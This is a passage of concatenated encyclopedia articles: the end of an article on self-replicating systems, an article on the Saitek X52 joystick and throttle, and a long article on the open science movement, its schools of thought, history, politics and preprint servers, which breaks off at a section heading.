Nanotechnologists in particular believe that their work will likely fail to reach a state of maturity until human beings design a self-replicating assembler of nanometer dimensions. These systems are substantially simpler than autotrophic systems, because they are provided with purified feedstocks and energy. They do not have to reproduce them. This distinction is at the root of some of the controversy about whether molecular manufacturing is possible or not. Many authorities who find it impossible are clearly citing sources for complex autotrophic self-replicating systems. Many of the authorities who find it possible are clearly citing sources for much simpler self-assembling systems, which have been demonstrated.
In the meantime, a Lego-built autonomous robot able to follow a pre-set track and assemble an exact copy of itself, starting from four externally provided components, was demonstrated experimentally in 2003. Merely exploiting the replicative abilities of existing cells is insufficient, because of limitations in the process of protein biosynthesis (also see the listing for RNA). What is required is the rational design of an entirely novel replicator with a much wider range of synthesis capabilities. In 2011, New York University scientists developed artificial structures that can self-replicate, a process that has the potential to yield new types of materials. They demonstrated that it is possible to replicate not just molecules like cellular DNA or RNA, but discrete structures that could in principle assume many different shapes, have many different functional features, and be associated with many different types of chemical species. For a discussion of other chemical bases for hypothetical self-replicating systems, see alternative biochemistry.
See also
Artificial life
Astrochicken
Autopoiesis
Complex system
DNA replication
Life
Robot
RepRap (self-replicating 3D printer)
Self-replicating machine
Self-replicating spacecraft
Space manufacturing
Von Neumann universal constructor
Virus
Von Neumann machine (disambiguation)
Self-reconfigurable
Final Anthropic Principle
Positive feedback
Harmonic
References
Notes
von Neumann, J., 1966, The Theory of Self-reproducing Automata, A. Burks, ed., Univ. of Illinois Press, Urbana, IL.
Advanced Automation for Space Missions, a 1980 NASA study edited by Robert Freitas
Kinematic Self-Replicating Machines, the first comprehensive survey of the entire field, by Robert Freitas and Ralph Merkle, 2004
NASA Institute for Advanced Concepts study by General Dynamics – concluded that the complexity of the development was equal to that of a Pentium 4, and promoted a design based on cellular automata.
Gödel, Escher, Bach by Douglas Hofstadter (detailed discussion and many examples)
Kenyon, R., Self-replicating tilings, in: Symbolic Dynamics and Applications (P. Walters, ed.), Contemporary Math. vol. 135 (1992), 239–264.
6708375
https://en.wikipedia.org/wiki/Saitek%20X52
Saitek X52
The Saitek X52 is an advanced HOTAS joystick/throttle combination from Saitek, released in 2004.
Features
The X52 was one of Saitek's flagship products and comprises both a joystick and a throttle. The distinguishing feature of the X52 is the large backlit blue (or green, on an X52 Pro) LCD display on the throttle, which shows the currently configured mode, the name of the button being depressed, and a chronograph function. The Multi-Function Display (MFD) screen can be used to check programmed command names and to use the clock and stopwatch functions for timing the legs of a flight plan. The joystick/throttle combination includes a number of controls, including trim wheels, a thumb-operated slider, a mouse control and three eight-way hat switches, and a button under a flip-guard labeled "Safe". The stick includes built-in yaw/rudder control, which can be disabled if the user has an alternate rudder control. The stick/throttle combination is designed to function as a HOTAS system. This means that games can be played without the player ever taking their hands off the controls to use a keyboard or mouse. The X52 uses only a single spring mounted vertically to keep it centered, while the X52 Pro uses dual springs for stronger centering. This enables quick direction changes on the stick without "clicking" through the axes – a problem common to other sticks, which normally feature two springs mounted horizontally. The X52 also features an integrated mouse on the throttle; however, it is difficult to use for making quick selections and only functions when the drivers and the SST software are installed. Featuring 23 buttons, three 8-way hat switches and 7 control axes, the X52 provides 47 basic commands plus the control axes. When the programming options provided by the Saitek Smart Technology programming software are included, which make use of the 3-position mode switch and the pinkie shift switch, the total number of programmable commands rises to 282.
Programming Software
The Smart Technology (ST) programming software is used to program all kinds of behaviors for each command of the HOTAS, even custom ones, such as setting not only the pinkie switch but just about any button to act as a shift. This makes it possible to have multiple shift buttons configured per game Profile, which raises the total number of programmable commands far above the nominal limit of 282. The software allows gamers to configure their controls to suit their preferred gaming style and to save the configurations as personal game Profiles, which can be selected and applied on the fly at any time through the HOTAS itself (the MFD lists the available Profile names). The use of multiple game Profiles prepared for each game makes the number of programmable functions per game virtually unlimited.
Support
Since the acquisition of Saitek in September 2016, Logitech has been providing both driver and ST programming software support for the X52 and X52 Pro HOTAS devices. Over the years, users have reported issues and stability problems regarding the use of Logitech's ST programming software. The old drivers and ST programming software from Saitek are still available at ftp.saitek.com (freely accessible through most FTP clients) and still work properly today on modern operating systems such as Windows 10.
Should the user of Logitech's driver and ST programming software decide to revert to the Saitek counterparts, a complete removal of the Logitech drivers and ST programming software, plus all related X52 peripherals installed in the system, is mandatory; otherwise the Saitek version of the ST programming software will fail to recognize and communicate with the HOTAS on account of the different hardware IDs set by the newer Logitech driver. To successfully use the ST programming software from Saitek, it is also necessary to use the companion driver from Saitek.
Joystick
Precision centering mechanism; non-contact technology on X and Y axes and constant spring force reduce free play, improve control and increase durability
2-stage metal trigger; 2 primary buttons in 1 convenient position
4 fire buttons, including a missile launcher with a spring-loaded safety cover for instant access
Conveniently positioned metal pinkie switch provides shift functionality to double up on programmable commands
2 x 8-way hat switches
3D rudder twist
3-position rotary mode selector switch with LED indicators
3 spring-loaded, base-mounted toggle switches for up to 6 programmable flight commands
5-position handle adjustment system to suit all hand sizes
Throttle
Progressive throttle with tension adjustment and 2 detents for afterburner and idle (set at 90% and 10% respectively)
2 fire buttons
Scroll wheel with built-in button
Mouse controller / hat switch with left mouse button
8-way hat switch
2 x rotary controls
Smooth-action slider control
Clutch button initiates 'safe mode' to allow on-the-fly Profile selection, or to display button functionality without activating it
References
External links
Saitek.com
Home computer peripherals
Video game controllers
6277878
https://en.wikipedia.org/wiki/Open%20science
Open science
Open science is the movement to make scientific research (including publications, data, physical samples, and software) and its dissemination accessible to all levels of society, amateur or professional. Open science is transparent and accessible knowledge that is shared and developed through collaborative networks. It encompasses practices such as publishing open research, campaigning for open access, encouraging scientists to practice open-notebook science, broader dissemination of and engagement in science, and generally making it easier to publish, access and communicate scientific knowledge. Usage of the term varies substantially across disciplines, with a notable prevalence in the STEM disciplines. Open research is often used quasi-synonymously to address the gap that the denotation of "science" might have regarding an inclusion of the Arts, Humanities and Social Sciences. The primary focus connecting all disciplines is the widespread uptake of new technologies and tools, and the underlying ecology of the production, dissemination and reception of knowledge from a research-based point of view. As Tennant et al. (2020) note, the term open science "implicitly seems only to regard 'scientific' disciplines, whereas open scholarship can be considered to include research from the Arts and Humanities (Eve 2014; Knöchelmann 2019), as well as the different roles and practices that researchers perform as educators and communicators, and an underlying open philosophy of sharing knowledge beyond research communities." Open science can be seen as a continuation of, rather than a revolution in, practices begun in the 17th century with the advent of the academic journal, when the societal demand for access to scientific knowledge reached a point at which it became necessary for groups of scientists to share resources with each other. In modern times there is debate about the extent to which scientific information should be shared. The conflict that led to the open science movement is between the desire of scientists to have access to shared resources and the desire of individual entities to profit when other entities partake of their resources. Additionally, the status of open access and the resources available for its promotion are likely to differ from one field of academic inquiry to another.
Principles
The six principles of open science are:
Open methodology
Open source
Open data
Open access
Open peer review
Open educational resources
Background
Science is broadly understood as collecting, analyzing, publishing, reanalyzing, critiquing, and reusing data. Proponents of open science identify a number of barriers that impede or dissuade the broad dissemination of scientific data. These include financial paywalls of for-profit research publishers, restrictions on usage applied by publishers of data, poor formatting of data or use of proprietary software that makes it difficult to re-purpose, and cultural reluctance to publish data for fear of losing control of how the information is used. According to the FOSTER taxonomy, open science can often include aspects of open access, open data and the open-source movement, whereby modern science requires software to process data and information. Open research computation also addresses the problem of reproducibility of scientific results.
Types
The term "open science" does not have any one fixed definition or operationalization. On the one hand, it has been referred to as a "puzzling phenomenon".
On the other hand, the term has been used to encapsulate a series of principles that aim to foster scientific growth and its complementary access to the public. Two influential sociologists, Benedikt Fecher and Sascha Friesike, have created multiple "schools of thought" that describe the different interpretations of the term. According to Fecher and Friesike, 'Open Science' is an umbrella term for various assumptions about the development and dissemination of knowledge. To show the term's multitudinous perceptions, they differentiate between five Open Science schools of thought: Infrastructure School The infrastructure school is founded on the assumption that "efficient" research depends on the availability of tools and applications. Therefore, the "goal" of the school is to promote the creation of openly available platforms, tools, and services for scientists. Hence, the infrastructure school is concerned with the technical infrastructure that promotes the development of emerging and developing research practices through the use of the internet, including the use of software and applications, in addition to conventional computing networks. In that sense, the infrastructure school regards open science as a technological challenge. The infrastructure school is tied closely to the notion of "cyberscience", which describes the trend of applying information and communication technologies to scientific research, a trend that has encouraged the development of the infrastructure school. Specific elements of this growth include increasing collaboration and interaction between scientists, as well as the development of "open-source science" practices. The sociologists discuss two central trends in the infrastructure school: 1. Distributed computing: This trend encapsulates practices that outsource complex, process-heavy scientific computing to a network of volunteer computers around the world. The example that the sociologists cite in their paper is the Open Science Grid, which enables the development of large-scale projects that require high-volume data management and processing, accomplished through a distributed computer network. Moreover, the grid provides the necessary tools that scientists can use to facilitate this process. 2. Social and Collaboration Networks of Scientists: This trend encapsulates the development of software that makes interaction with other researchers and scientific collaborations much easier than traditional, non-digital practices. Specifically, the trend is focused on implementing newer Web 2.0 tools to facilitate research-related activities on the internet. De Roure and colleagues (2008) list a series of four key capabilities which they believe define a Social Virtual Research Environment (SVRE): The SVRE should primarily aid the management and sharing of research objects. The authors define these to be a variety of digital commodities that are used repeatedly by researchers. Second, the SVRE should have inbuilt incentives for researchers to make their research objects available on the online platform. Third, the SVRE should be "open" as well as "extensible", implying that different types of digital artifacts composing the SVRE can be easily integrated. Fourth, the authors propose that the SVRE is more than a simple storage tool for research information. Instead, the researchers propose that the platform should be "actionable". 
That is, the platform should be built in such a way that research objects can be used in the conduct of research as opposed to simply being stored. Measurement school The measurement school, in the view of the authors, deals with developing alternative methods to determine scientific impact. This school acknowledges that measurements of scientific impact are crucial to a researcher's reputation, funding opportunities, and career development. Hence, the authors argue that any discourse about Open Science revolves around developing a robust measure of scientific impact in the digital age. The authors then discuss other research indicating support for the measurement school. The three key currents of previous literature discussed by the authors are: Peer review is described as time-consuming. The impact of an article, tied to the names of its authors, is related more to the circulation of the journal than to the overall quality of the article itself. New publishing formats that are closely aligned with the philosophy of Open Science are rarely found in the format of a journal that allows for the assignment of an impact factor. Hence, this school argues that there are faster impact measurement technologies that can account for a range of publication types as well as social media coverage of a scientific contribution to arrive at a complete evaluation of how impactful the contribution was. The gist of the argument for this school is that hidden uses like reading, bookmarking, sharing, discussing and rating are traceable activities, and these traces can and should be used to develop a newer measure of scientific impact. The umbrella term for this new type of impact measurement is altmetrics, coined in a 2011 article by Priem et al. Notably, the authors discuss evidence that altmetrics differ from traditional webometrics, which are slow and unstructured. Altmetrics are proposed to rely upon a greater set of measures that account for tweets, blogs, discussions, and bookmarks. The authors claim that the existing literature has often proposed that altmetrics should also encapsulate the scientific process, and measure the process of research and collaboration to create an overall metric. However, the authors are explicit in their assessment that few papers offer methodological details as to how to accomplish this. The authors use this and the general dearth of evidence to conclude that research in the area of altmetrics is still in its infancy. Public School According to the authors, the central concern of the school is to make science accessible to a wider audience. The inherent assumption of this school, as described by the authors, is that newer communication technologies such as Web 2.0 allow scientists to open up the research process and also allow scientists to better prepare their "products of research" for interested non-experts. Hence, the school is characterized by two broad streams: one argues for giving the masses access to the research process, whereas the other argues for increased public access to the products of science. Accessibility to the Research Process: Communication technology allows not only for the constant documentation of research but also promotes the inclusion of many different external individuals in the process itself. The authors cite citizen science: the participation of non-scientists and amateurs in research. 
The authors discuss instances in which gaming tools allow scientists to harness the brain power of a volunteer workforce to run through many permutations of protein-folding structures. This allows scientists to eliminate many more plausible protein structures while also "enriching" citizens' understanding of science. The authors also discuss a common criticism of this approach: the amateur nature of the participants threatens to undermine the scientific rigor of experimentation. Comprehensibility of the Research Result: This stream of research concerns itself with making research understandable for a wider audience. The authors describe a host of authors who promote the use of specific tools for scientific communication, such as microblogging services, to direct users to relevant literature. The authors claim that this school proposes that it is the obligation of every researcher to make their research accessible to the public. The authors then proceed to discuss whether there is an emerging market for brokers and mediators of knowledge that is otherwise too complicated for the public to grasp. Democratic school The democratic school concerns itself with the concept of access to knowledge. As opposed to focusing on the accessibility of research and its understandability, advocates of this school focus on public access to the products of research. The central concern of the school is with the legal and other obstacles that hinder public access to research publications and scientific data. Proponents assert that any research product should be freely available, and that everyone has the same, equal right of access to knowledge, especially in the instances of state-funded experiments and data. Two central currents characterize this school: Open Access and Open Data. Open Data: Opposition to the notion that publishing journals should claim copyright over experimental data, which prevents the re-use of data and therefore lowers the overall efficiency of science in general. The claim is that journals have no use for the experimental data and that allowing other researchers to use this data will be fruitful. Only a quarter of researchers agree to share their data with other researchers because of the effort required for compliance. Open Access to Research Publication: According to this school, there is a gap between the creation and sharing of knowledge. Proponents argue that even though scientific knowledge doubles every 5 years, access to this knowledge remains limited. These proponents consider access to knowledge a necessity for human development, especially in the economic sense. Pragmatic School The pragmatic school considers Open Science the possibility of making knowledge creation and dissemination more efficient by increasing collaboration throughout the research process. Proponents argue that science could be optimized by modularizing the process and opening up the scientific value chain. 'Open' in this sense follows very much the concept of open innovation. It transfers, for instance, the outside-in (including external knowledge in the production process) and inside-out (spillovers from the formerly closed production process) principles of open innovation to science. Web 2.0 is considered a set of helpful tools that can foster collaboration (sometimes also referred to as Science 2.0). Further, citizen science is seen as a form of collaboration that includes knowledge and information from non-scientists. 
Fecher and Friesike describe data sharing as an example of the pragmatic school, as it enables researchers to use other researchers' data to pursue new research questions or to conduct data-driven replications. History The widespread adoption of the institution of the scientific journal marks the beginning of the modern concept of open science. Before this time societies pressured scientists into secretive behaviors. Before journals Before the advent of scientific journals, scientists had little to gain and much to lose by publicizing scientific discoveries. Many scientists, including Galileo, Kepler, Isaac Newton, Christiaan Huygens, and Robert Hooke, laid claim to their discoveries by describing them in papers coded in anagrams or cyphers and then distributing the coded text. Their intent was to develop their discovery into something from which they could profit, then reveal their discovery to prove ownership when they were prepared to make a claim on it. The system of not publicizing discoveries caused problems because discoveries were not shared quickly and because it sometimes was difficult for the discoverer to prove priority. Newton and Gottfried Leibniz both claimed priority in discovering calculus. Newton said that he wrote about calculus in the 1660s and 1670s, but did not publish until 1693. Leibniz published "Nova Methodus pro Maximis et Minimis", a treatise on calculus, in 1684. Debates over priority are inherent in systems where science is not published openly, and this was problematic for scientists who wanted to benefit from priority. These cases are representative of a system of aristocratic patronage in which scientists received funding either to develop immediately useful things or to entertain. In this sense, funding of science gave prestige to the patron in the same way that funding of artists, writers, architects, and philosophers did. Because of this, scientists were under pressure to satisfy the desires of their patrons, and discouraged from being open with research which would bring prestige to persons other than their patrons. Emergence of academies and journals Eventually the individual patronage system ceased to provide the scientific output which society began to demand. Single patrons could not sufficiently fund scientists, who had unstable careers and needed consistent funding. The development which changed this was a trend to pool research by multiple scientists into an academy funded by multiple patrons. In 1660 England established the Royal Society and in 1666 the French established the French Academy of Sciences. Between the 1660s and 1793, governments gave official recognition to 70 other scientific organizations modeled after those two academies. In 1665, Henry Oldenburg became the editor of Philosophical Transactions of the Royal Society, the first academic journal devoted to science, and the foundation for the growth of scientific publishing. By 1699 there were 30 scientific journals; by 1790 there were 1052. Since then publishing has expanded at even greater rates. Popular Science Writing The first popular science periodical of its kind was published in 1872, under a suggestive name that is still a modern portal for science journalism: Popular Science. The magazine claims to have documented the invention of the telephone, the phonograph, the electric light and the onset of automobile technology. The magazine goes so far as to claim that the "history of Popular Science is a true reflection of humankind's progress over the past 129+ years". 
Discussions of popular science writing most often center their arguments on some type of "science boom". A recent historiographic account of popular science traces mentions of the term "science boom" to Daniel Greenberg's Science and Government Reports in 1979, which posited that "Scientific magazines are bursting out all over." Similarly, this account discusses the publication Time and its 1980 cover story on Carl Sagan as propagating the claim that popular science had "turned into enthusiasm". Crucially, this secondary account asks the important question of what was considered popular "science" to begin with. The paper claims that any account of how popular science writing bridged the gap between the informed masses and the expert scientists must first consider who was considered a scientist to begin with. Collaboration among academies In modern times many academies have pressured researchers at publicly funded universities and research institutions to engage in a mix of sharing research and making some technological developments proprietary. Some research products have the potential to generate commercial revenue, and in hope of capitalizing on these products, many research institutions withhold information and technology which otherwise would lead to overall scientific advancement if other research institutions had access to these resources. It is difficult to predict the potential payouts of technology or to assess the costs of withholding it, but there is general agreement that the benefit to any single institution of holding technology is not as great as the cost of withholding it from all other research institutions. Coining of phrase "Open Science" Although Steve Mann claims to have coined the phrase "Open Science" in 1998, at which time he also registered the domain names openscience.com and openscience.org, which he sold to degruyter.com in 2011, it was actually first used in a manner that refers to today's 'open science' norms by Daryl E. Chubin in his essay "Open Science and Closed Science: Tradeoffs in a Democracy". Chubin's essay was essentially a revisiting of Robert K. Merton's 1942 proposal of what we now refer to as Mertonian Norms for ideal science practices and scientific modes of communication. The term was used sporadically in the 1970s and 1980s in various scholarship to refer to different things, but clearly Steve Mann does not deserve credit for inventing this term or the movement leading to its adoption. Internet and the free access to scientific documents The open science movement, as presented in activist and institutional discourses at the beginning of the 21st century, refers to different ways of opening up science, especially in the Internet age. Its first pillar is free access to scientific publications. The Budapest conference organised by the Open Society Foundations in 2001 was decisive in placing this issue on the political agenda. The resulting declaration calls for the use of digital tools such as open archives and open access journals, free of charge for the reader. The idea of open access to scientific publications quickly became inseparable from the question of free licenses to guarantee the right to disseminate and possibly modify shared documents, such as the Creative Commons licenses, created in 2002. In 2011, a new text from the Budapest Open Access Initiative explicitly refers to the relevance of the CC-BY license to guarantee free dissemination and not only free access to a scientific document. 
The promise of openness brought by the Internet was then extended to research data, which underpins scientific studies in different disciplines, as already mentioned in the Berlin Declaration of 2003. In 2007, the Organisation for Economic Co-operation and Development (OECD) published a report on access to publicly funded research data, in which it defined research data as the data that validate research results. Beyond its democratic virtues, open science aims to respond to the replication crisis of research results, notably by generalizing the opening of the data or source code used to produce them or through the dissemination of methodological articles. The open science movement inspired several regulatory and legislative measures. Thus, in 2007, the University of Liège made the deposit of its researchers' publications in its institutional open repository (Orbi) compulsory. The next year, the NIH Public Access Policy adopted a similar mandate for every paper funded by the National Institutes of Health. In France, the Law for a Digital Republic, enacted in 2016, created the right to deposit the validated manuscript of a scientific article in an open archive, with an embargo period following the date of publication in the journal. The law also created the principle of reuse of public data by default. Politics In many countries, governments fund some science research. Scientists often publish the results of their research by writing articles and donating them to be published in scholarly journals, which frequently are commercial. Public entities such as universities and libraries subscribe to these journals. Michael Eisen, a founder of the Public Library of Science, has described this system by saying that "taxpayers who already paid for the research would have to pay again to read the results." In December 2011, some United States legislators introduced a bill called the Research Works Act, which would prohibit federal agencies from issuing grants with any provision requiring that articles reporting on taxpayer-funded research be published for free to the public online. Darrell Issa, a co-sponsor of the bill, explained the bill by saying that "Publicly funded research is and must continue to be absolutely available to the public. We must also protect the value added to publicly funded research by the private sector and ensure that there is still an active commercial and non-profit research community." One response to this bill was protests from various researchers; among them was a boycott of commercial publisher Elsevier called The Cost of Knowledge. The Dutch Presidency of the Council of the European Union called for action in April 2016 to migrate European Commission funded research to Open Science. European Commissioner Carlos Moedas introduced the Open Science Cloud at the Open Science Conference in Amsterdam on 4–5 April. During this meeting, the Amsterdam Call for Action on Open Science was also presented, a living document outlining concrete actions for the European Community to move to Open Science. The European Commission continues to be committed to an Open Science policy, including the development of a repository for digital research objects, the European Open Science Cloud (EOSC), and metrics for evaluating quality and impact. In October 2021, the French Ministry of Higher Education, Research and Innovation released an official translation of its second plan for open science spanning the years 2021–2024. 
Standard setting instruments There is currently no global normative framework covering all aspects of Open Science. In November 2019, UNESCO was tasked by its 193 Member States, during their 40th General Conference, with leading a global dialogue on Open Science to identify globally agreed norms and to create a standard-setting instrument. The multistakeholder, consultative, inclusive and participatory process to define a new global normative instrument on Open Science is expected to take two years and to lead to the adoption of a UNESCO Recommendation on Open Science by Member States in 2021. Two UN frameworks set out some common global standards for the application of Open Science and closely related concepts: the UNESCO Recommendation on Science and Scientific Researchers, approved by the General Conference at its 39th session in 2017, and the UNESCO Strategy on Open Access to scientific information and research, approved by the General Conference at its 36th session in 2011. Advantages and disadvantages Arguments in favor of open science generally focus on the value of increased transparency in research, and on the public ownership of science, particularly that which is publicly funded. In January 2014 J. Christopher Bare published a comprehensive "Guide to Open Science". Likewise, in 2017, a group of scholars known for advocating open science published a "manifesto" for open science in the journal Nature. Advantages Open access publication of research reports and data allows for rigorous peer review An article published by a team of NASA astrobiologists in 2010 in Science reported a bacterium known as GFAJ-1 that could purportedly metabolize arsenic (unlike any previously known species of lifeform). This finding, along with NASA's claim that the paper "will impact the search for evidence of extraterrestrial life", met with criticism within the scientific community. Much of the scientific commentary and critique around this issue took place in public forums, most notably on Twitter, where hundreds of scientists and non-scientists created a hashtag community around the hashtag #arseniclife. University of British Columbia astrobiologist Rosie Redfield, one of the most vocal critics of the NASA team's research, also submitted a draft research report of a study that she and her colleagues had conducted, which contradicted the NASA team's findings; the draft report appeared in arXiv, an open-research repository, and Redfield called in her lab's research blog for peer review both of their research and of the NASA team's original paper. Researcher Jeff Rouder defined Open Science as "endeavoring to preserve the rights of others to reach independent conclusions about your data and work". Publicly funded science will be publicly available Public funding of research has long been cited as one of the primary reasons for providing Open Access to research articles. Since there is significant value in other parts of the research, such as code, data, protocols, and research proposals, a similar argument is made that since these are publicly funded, they should be publicly available under a Creative Commons Licence. Open science will make science more reproducible and transparent Increasingly, the reproducibility of science is being questioned, and it has been shown to be lacking for many papers and in multiple fields of research. This problem has been described as a "reproducibility crisis". 
For example, psychologist Stuart Vyse notes that "(r)ecent research aimed at previously published psychology studies has demonstrated – shockingly – that a large number of classic phenomena cannot be reproduced, and the popularity of p-hacking is thought to be one of the culprits." Open Science approaches are proposed as one way to help increase the reproducibility of work as well as to help mitigate the manipulation of data. Open science has more impact There are several components to impact in research, many of which are hotly debated. However, under traditional scientific metrics, parts of Open science such as Open Access and Open Data have proved to outperform traditional versions. Open science will help answer uniquely complex questions Recent arguments in favor of Open Science have maintained that Open Science is a necessary tool to begin answering immensely complex questions, such as the neural basis of consciousness, or pandemics such as COVID-19. The typical argument is that these types of investigations are too complex to be carried out by any one individual, and therefore they must rely on a network of open scientists to be accomplished. By default, the nature of these investigations also makes this "open science" into "big science". It is thought that open science could support innovation and societal benefits, supporting and reinforcing research activities by enabling digital resources that could, for example, use or provide structured open data. Disadvantages Arguments against open science tend to focus on the advantages of data ownership and concerns about the misuse of data. Potential misuse In 2011, Dutch researchers announced their intention to publish a research paper in the journal Science describing the creation of a strain of H5N1 influenza which can be easily passed between ferrets, the mammals which most closely mimic the human response to the flu. The announcement triggered a controversy in both political and scientific circles about the ethical implications of publishing scientific data which could be used to create biological weapons. These events are examples of how science data could potentially be misused. It has been argued that constraining the dissemination of dual-use knowledge can in certain cases be justified because, for example, "scientists have a responsibility for potentially harmful consequences of their research; the public need not always know of all scientific discoveries [or all its details]; uncertainty about the risks of harm may warrant precaution; and expected benefits do not always outweigh potential harm". Scientists have collaboratively agreed to limit their own fields of inquiry on occasions such as the Asilomar conference on recombinant DNA in 1975, and a proposed 2015 worldwide moratorium on a human-genome-editing technique. Differential technological development aims to decrease risks by influencing the sequence in which technologies are developed. Relying only on the established form of legislation and incentives to ensure the right outcomes may not be adequate, as these may often be too slow. The public may misunderstand science data In 2009 NASA launched the Kepler spacecraft and promised that they would release collected data in June 2010. Later they decided to postpone release so that their scientists could look at it first. 
Their rationale was that non-scientists might unintentionally misinterpret the data, and NASA scientists thought it would be preferable for them to be familiar with the data in advance so that they could report on it accurately. Low-quality science Post-publication peer review, a staple of open science, has been criticized as promoting the production of lower quality papers that are extremely voluminous. Specifically, critics assert that as quality is not guaranteed by preprint servers, the veracity of papers will be difficult to assess by individual readers. This will lead to rippling effects of false science, akin to the recent epidemic of false news, propagated with ease on social media websites. Commonly cited solutions to this problem involve adopting a new format in which everything is allowed to be published but a subsequent filter-curator model is imposed to ensure that some basic quality standards are met by all publications. Entrapment by platform capitalism For Philip Mirowski, open science runs the risk of continuing a trend of commodification of science which ultimately serves the interests of capital in the guise of platform capitalism. Actions and initiatives Open-science projects Different projects conduct, advocate, develop tools for, or fund open science. The Allen Institute for Brain Science conducts numerous open science projects while the Center for Open Science has projects to conduct, advocate, and create tools for open science. Other workgroups have been created in different fields, such as the Decision Analysis in R for Technologies in Health (DARTH) workgroup, which is a multi-institutional, multi-university collaborative effort by researchers who have a common goal of developing transparent and open-source solutions to decision analysis in health. Organizations have extremely diverse sizes and structures. The Open Knowledge Foundation (OKF) is a global organization sharing large data catalogs, running face-to-face conferences, and supporting open-source software projects. In contrast, Blue Obelisk is an informal group of chemists and associated cheminformatics projects. The tableau of organizations is dynamic, with some organizations becoming defunct, e.g., Science Commons, and new organizations trying to grow, e.g., the Self-Journal of Science. Common organizing forces include the knowledge domain, type of service provided, and even geography, e.g., OCSDNet's concentration on the developing world. The Allen Brain Atlas maps gene expression in human and mouse brains; the Encyclopedia of Life documents all the terrestrial species; the Galaxy Zoo classifies galaxies; the International HapMap Project maps the haplotypes of the human genome; the Monarch Initiative makes available integrated public model organism and clinical data; and the Sloan Digital Sky Survey regularizes and publishes data sets from many sources. All these projects accrete information provided by many different researchers with different standards of curation and contribution. Mathematician Timothy Gowers launched the open science journal Discrete Analysis in 2016 to demonstrate that a high-quality mathematics journal could be produced outside the traditional academic publishing industry. The launch followed a boycott of scientific journals that he initiated. The journal is published by a nonprofit organization owned and run by a team of scholars. Other projects are organized around the completion of projects that require extensive collaboration. 
For example, OpenWorm, a multidisciplinary project, seeks to build a cellular-level simulation of a roundworm. The Polymath Project seeks to solve difficult mathematical problems by enabling faster communications within the discipline of mathematics. The Collaborative Replications and Education project recruits undergraduate students as citizen scientists by offering funding. Each project defines its needs for contributors and collaboration. Another practical example of an open science project was the first "open" doctoral thesis, started in 2012. It was made publicly available as a self-experiment right from the start to examine whether this dissemination is even possible during the productive stage of scientific studies. The goal of the dissertation project was to publish everything related to the doctoral study and research process as soon as possible, as comprehensively as possible, under an open license, and available online at all times for everyone. At the end of 2017, the experiment was successfully completed and published in early 2018 as an open access book. The ideas of open science have also been applied to recruitment with jobRxiv, a free and international job board that aims to mitigate imbalances in what different labs can afford to spend on hiring. Advocacy Numerous documents, organizations, and social movements advocate wider adoption of open science. Statements of principles include the Budapest Open Access Initiative from a December 2001 conference and the Panton Principles. New statements are constantly developed, such as the Amsterdam Call for Action on Open Science to be presented to the Dutch Presidency of the Council of the European Union in late May 2016. These statements often try to regularize licenses and disclosure for data and scientific literature. Other advocates concentrate on educating scientists about appropriate open science software tools. Education is available as training seminars, e.g., the Software Carpentry project; as domain-specific training materials, e.g., the Data Carpentry project; and as materials for teaching graduate classes, e.g., the Open Science Training Initiative. Many organizations also provide education in the general principles of open science. Within scholarly societies there are also sections and interest groups that promote open science practices. The Ecological Society of America has an Open Science Section. Similarly, the Society for American Archaeology has an Open Science Interest Group. Journal support Many individual journals are experimenting with the open access model: the Public Library of Science, or PLOS, is creating a library of open access journals and scientific literature. Other publishing experiments include delayed and hybrid models. There are experiments in different fields: F1000Research provides open publishing and open peer review for the life sciences. The open-science initiative of the Empirical Software Engineering Journal encourages authors to submit a replication package, which is assessed with an open science badge. The Open Library of Humanities is a non-profit open access publisher for the humanities and social sciences. The Journals Library of the National Institute for Health Research (NIHR) publishes all relevant documents and data from the onset of research projects, updating them alongside the progress of the study. 
Journal support for open science does not conflict with preprint servers: figshare archives and shares images, readings, and other data; and Open Science Framework preprints, arXiv, and HAL Archives Ouvertes provide electronic preprints across many fields. Software A variety of computer resources support open science. These include software like the Open Science Framework from the Center for Open Science to manage project information, data archiving and team coordination; distributed computing services like Ibercivis to use unused CPU time for computationally intensive tasks; and services like Experiment.com to provide crowdsourced funding for research projects. Blockchain platforms for open science have been proposed. The first such platform is the Open Science Organization, which aims to solve urgent problems with fragmentation of the scientific ecosystem and the difficulties of producing validated, quality science. The initiatives of the Open Science Organization include the Interplanetary Idea System (IPIS), Researcher Index (RR-index), Unique Researcher Identity (URI), and Research Network. The Interplanetary Idea System is a blockchain-based system that tracks the evolution of scientific ideas over time. It serves to quantify ideas based on uniqueness and importance, thus allowing the scientific community to identify pain points with current scientific topics and preventing unnecessary re-invention of previously conducted science. The Researcher Index aims to establish a data-driven statistical metric for quantifying researcher impact. The Unique Researcher Identity is a blockchain-based solution for creating a single unifying identity for each researcher, which is connected to the researcher's profile, research activities, and publications. The Research Network is a social networking platform for researchers. A scientific paper from November 2019 examined the suitability of blockchain technology to support open science. Preprint servers Preprint servers come in many varieties, but the standard traits across them are stable: they seek to create a quick, free mode of communicating scientific knowledge to the public. Preprint servers act as a venue to quickly disseminate research and vary in their policies concerning when articles may be submitted relative to journal acceptance. Also typical of preprint servers is their lack of a peer-review process – typically, preprint servers have some type of quality check in place to ensure a minimum standard of publication, but this mechanism is not the same as a peer-review mechanism. Some preprint servers have explicitly partnered with the broader open science movement. Preprint servers can offer services similar to those of journals, and Google Scholar indexes many preprint servers and collects information about citations to preprints. The case for preprint servers is often made based on the slow pace of conventional publication formats. The motivation to start SocArXiv, an open-access preprint server for social science research, is the claim that valuable research submitted to traditional venues often takes months or years to be published, which slows down the process of science significantly. Another argument made in favor of preprint servers like SocArXiv is the quality and speed of feedback offered to scientists on their pre-published work. 
The founders of SocArXiv claim that their platform allows researchers to gain easy feedback from their colleagues on the platform, thereby allowing scientists to develop their work to the highest possible quality before formal publication and circulation. The founders of SocArXiv further claim that their platform affords the authors the greatest level of flexibility in updating and editing their work to ensure that the latest version is available for rapid dissemination. The founders claim that this is not traditionally the case with formal journals, which institute formal procedures for making updates to published articles. Perhaps the strongest advantage of some preprint servers is their seamless compatibility with Open Science software such as the Open Science Framework. The founders of SocArXiv claim that their preprint server connects all aspects of the research life cycle in OSF with the article being published on the preprint server. According to the founders, this allows for greater transparency and minimal work on the authors' part. One criticism of pre-print servers is their potential to foster a culture of plagiarism. For example, the popular physics preprint server arXiv had to withdraw 22 papers when it came to light that they were plagiarized. In June 2002, a high-energy physicist in Japan was contacted by a man called Ramy Naboulsi, a non-institutionally affiliated mathematical physicist. Naboulsi asked the physicist, Watanabe, to upload his papers to arXiv on his behalf, as Naboulsi was not able to do so himself because he lacked an institutional affiliation. The papers were later found to have been copied from the proceedings of a physics conference. Preprint servers are increasingly developing measures to circumvent this plagiarism problem. In developing nations 